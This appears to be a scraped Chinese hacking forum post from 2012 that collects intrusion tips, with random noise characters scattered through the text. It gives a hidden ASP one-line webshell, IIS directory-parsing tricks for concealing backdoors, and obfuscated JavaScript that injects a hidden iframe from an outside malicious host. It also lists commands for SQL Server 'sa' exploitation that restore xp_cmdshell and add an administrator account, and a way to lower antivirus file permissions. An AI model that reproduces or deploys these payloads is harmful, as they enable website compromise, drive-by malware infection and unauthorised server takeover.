$ m( v1 C: t+ @6 k53、隐藏ASP后门的两种方法
9 W3 P6 _2 \# {" q) Q3 h m0 d1、建立非标准目录:mkdir images..\1 ^* N: C% g/ n6 F: O6 e
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp8 Q% m5 d: t3 C& ~
通过web访问ASP木马:http://ip/images../news.asp?action=login
( _, m$ G1 H0 E如何删除非标准目录:rmdir images..\ /s. j1 ]! r. L4 C1 y- i* ]1 j* o
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
4 H: Y% m1 `0 Rmkdir programme.asp
$ u r2 g' P" h7 [6 u2 m新建1.txt文件内容:<!--#include file=”12.jpg”-->* A! R+ d) w+ O/ t" p" H
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件: k* Z8 d. a+ J) e) A+ a
attrib +H +S programme.asp$ v( N9 }- @/ S& {9 ~4 I
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
- {; Y; W8 h9 V1 {& w/ F8 U
0 m* p4 O8 \( @: a54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。! h% g! _% l, x, q
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
: i9 l( t( ~3 F/ {6 u( F3 {1 y7 G# \/ Y% Z0 |; F% M
55、JS隐蔽挂马
6 P. `: @1 p) c$ V3 s1.
, H2 |1 l c0 ]# m! V4 Mvar tr4c3="<iframe src=ht";8 q: H* ^ Y* g: b
tr4c3 = tr4c3+"tp:/";) w: i% D8 y" a, V9 y
tr4c3 = tr4c3+"/ww";. F! ^ v2 R; v/ s% P0 s" `0 P' |
tr4c3 = tr4c3+"w.tr4";0 l1 r& y- w- C6 Q5 _2 R+ ~- w
tr4c3 = tr4c3+"c3.com/inc/m";
9 p3 {7 h' S5 @% `+ x) ~tr4c3 = tr4c3+"m.htm style="display:none"></i";+ ~; c( m I4 P: s. _$ e' {; C& p
tr4c3 =tr4c3+"frame>'";
?( z8 Y5 G( x/ h& Bdocument.write(tr4c3);# O5 r; p a8 j7 U' L( K' s9 G
避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。& z8 L* ?# h4 V8 b7 M# w
3 `" X% B/ U' V# `2.
3 n* H6 ^ b+ ]; I转换进制,然后用EVAL执行。如
1 |7 t( i. G. a( \+ O* Q j+ deval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");8 y# j! C, M! k7 Z3 Z
不过这个有点显眼。
5 K' A5 Z: w, h: A3. K* S; T$ F; ?. l9 G
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
" r7 s/ X8 a% n9 N9 W5 o( D最后一点,别忘了把文件的时间也修改下。
' ~4 y; m' }, _& W! x0 J. T; |4 n% X' ?5 c. o1 q
56.3389终端入侵常用DOS命令
0 X: q7 a1 F' f0 z/ gtaskkill taskkill /PID 1248 /t
5 d6 t4 I, `# g: L* u7 l+ `$ p2 c: I1 H
tasklist 查进程8 g' P9 c2 Z* U; o- V2 F% {# V
5 N! Q( r3 m% ^/ K
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
! \" ?, d! L& ~1 s! w! _/ piisreset /reboot
- `) h* S; I4 y% C; j' {, t" |8 Itsshutdn /reboot /delay:1 重起服务器! y1 O' Y0 U# H' E5 Z1 V' e
& B' T3 H9 J, h, q# Alogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,2 I8 i, W3 Z `/ X3 O
# `- x" A6 J4 }* o( A
query user 查看当前终端用户在线情况: y* Q8 ]0 p& F5 }8 y% ?
* l" [- L5 G' J9 B6 W2 C8 Y要显示有关所有会话使用的进程的信息,请键入:query process *1 `8 O6 B5 c, u' @% `7 I' x
+ L& j8 D) E* k6 G% B要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:20 F- N' U- t$ G% U
' f U( G8 e- }: d' h. q# d: S; B. B要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2/ `. I5 e: A0 B
* m% }, _, |1 X4 R3 r0 b/ l; Y
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM028 h9 _* w: @4 \. F( A7 i8 Z0 ]
9 S% e+ @5 C( ]! o) k: x
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
% P$ q N7 r# b" o/ U8 X) h$ ]5 _8 L3 L# b9 \0 g6 _4 W
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
) C0 T0 V& Y5 q! Y* |1 W6 ?( [8 E% n- V. O x
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
' }' ]* [* s Y: C( X7 @1 z+ ?
; `( [5 u" Z' ?1 a9 Z& O( f% Z a命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机1 B W% f# b y g; {7 m' @5 [
0 r- P: Q7 `; F7 V" i56、在地址栏或按Ctrl+O,输入:2 d- w. H" Q+ v$ Z5 R' Z( }- R
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
) w0 h: b0 ]) p0 @" x5 p
# }# F9 {) w( e源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。: m( |* w% z( e9 o
6 O4 R$ q) J2 K. }57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
% C; y+ o; h# k+ p0 ~用net localgroup administrators是可以看到管理组下,加了$的用户的。$ b5 n4 c S( v: g6 q9 Y$ A: E0 l
% B4 L6 k& o8 B) y9 u58、 sa弱口令相关命令
* y* ]& o& U4 @& p; W" a- w+ T5 V) r2 x E. }
一.更改sa口令方法:6 ~3 ~2 m9 d! p2 N7 O
用sql综合利用工具连接后,执行命令:4 O1 I6 C2 q/ A+ T4 n2 ?' \
exec sp_password NULL,'20001001','sa'7 ~% p6 B4 P( i }
(提示:慎用!) n" w4 A1 }0 {6 [3 m
) f' j. j* L& ?; D. ?$ Z二.简单修补sa弱口令.+ v5 D3 H: Y" p+ I
4 Z7 Z) L, a! e% D. P+ b+ X# z* p' H方法1:查询分离器连接后执行:
( n" I: ?# R* Mif exists (select * from
& s" z6 Y7 @6 y9 q8 adbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and7 d$ z7 o, x6 O; E8 l4 b! u, V& f) d
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
7 Y& G, x9 T9 e9 g# \8 s4 m2 n) n) c
- m/ X7 x5 A# l3 {2 V, Uexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
* Q( j+ U# w) g5 t- C4 h0 O, l
, U, i9 @3 e0 ~% B' XGO
N% X/ W5 j+ B1 ~/ ]
$ ~- r* S4 x8 L& a/ q然后按F5键命令执行完毕
8 ]0 v! h9 e" Y/ I4 G
$ O; E$ `) F2 B方法2:查询分离器连接后
4 |6 _/ j: {0 I T( _: ?& i: m第一步执行:use master
3 w, x' F. J: O2 G第二步执行:sp_dropextendedproc 'xp_cmdshell'( a# ]* k5 _) u* i" C
然后按F5键命令执行完毕3 R. m, G' H2 h/ L, S
6 m7 J0 R. B; c. Y. b; \2 F9 x$ \. S3 A; r z: ]& r; g/ W9 s5 C
三.常见情况恢复执行xp_cmdshell.
# ?2 r! q& `* g& e5 j
7 c) Z7 R3 k0 m) ]% ?* r6 S. V I$ T# [
1 未能找到存储过程'master..xpcmdshell'.. V0 i8 X3 ?! l& G1 n9 m- o% \
恢复方法:查询分离器连接后,; \- k% k& k; `/ T% G7 }) V
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
7 n: \; d+ `: B4 p$ m第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll', m2 R6 A+ F% H6 k
然后按F5键命令执行完毕
* ~/ H8 g8 C" V8 G5 ?9 b$ g# K) E- z+ t1 w8 N4 H4 ]
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。), |" y8 |6 H4 G9 I, Q3 F/ k
恢复方法:查询分离器连接后,/ m% F1 H$ B7 d
第一步执行:sp_dropextendedproc "xp_cmdshell"8 r6 I. s, u& g1 G
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
- r' l U' T# ]- k然后按F5键命令执行完毕& J$ q) z0 O. E. ^( Y" F0 X% B3 a
# D7 @% r0 N' X3 \6 x
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。): f/ r+ ` h. S( L6 M+ H
恢复方法:查询分离器连接后,% ^. Z. O; b3 i: `! _' \8 A
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
+ ]/ u/ S0 r: m3 n( ?- Z9 M: M第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
- J9 A6 O% Q( r9 k5 i1 c! k然后按F5键命令执行完毕% A3 b, Z# E8 L
& q( Y t: A: h; K. A6 o; W4 `
四.终极方法.
: W' P! ~( b0 N8 r* g1 D$ L如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:" r% x0 D# _$ l3 D) x5 y
查询分离器连接后,: B" i: k$ m% \5 j& N# |
2000servser系统:2 I8 r4 ^6 z v% R" ?
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add') j5 {: k! u% u, k
/ W. _: ^, s9 L% E. Ydeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
# L+ R; R# O& u9 {. {& {0 y5 Z m) S+ Y2 G; y6 `' j0 l
xp或2003server系统:! P# u% L# N$ C5 Z. M1 @( q
! W% M9 b9 ?7 ?; r
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
! K" Y( D. E2 n* ^/ Q- i/ w7 B. Z7 z. j" x
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'$ u; {- Z/ `$ `! T4 A! K
|
发表于 2012-9-15 14:13:15
收藏
支持
反对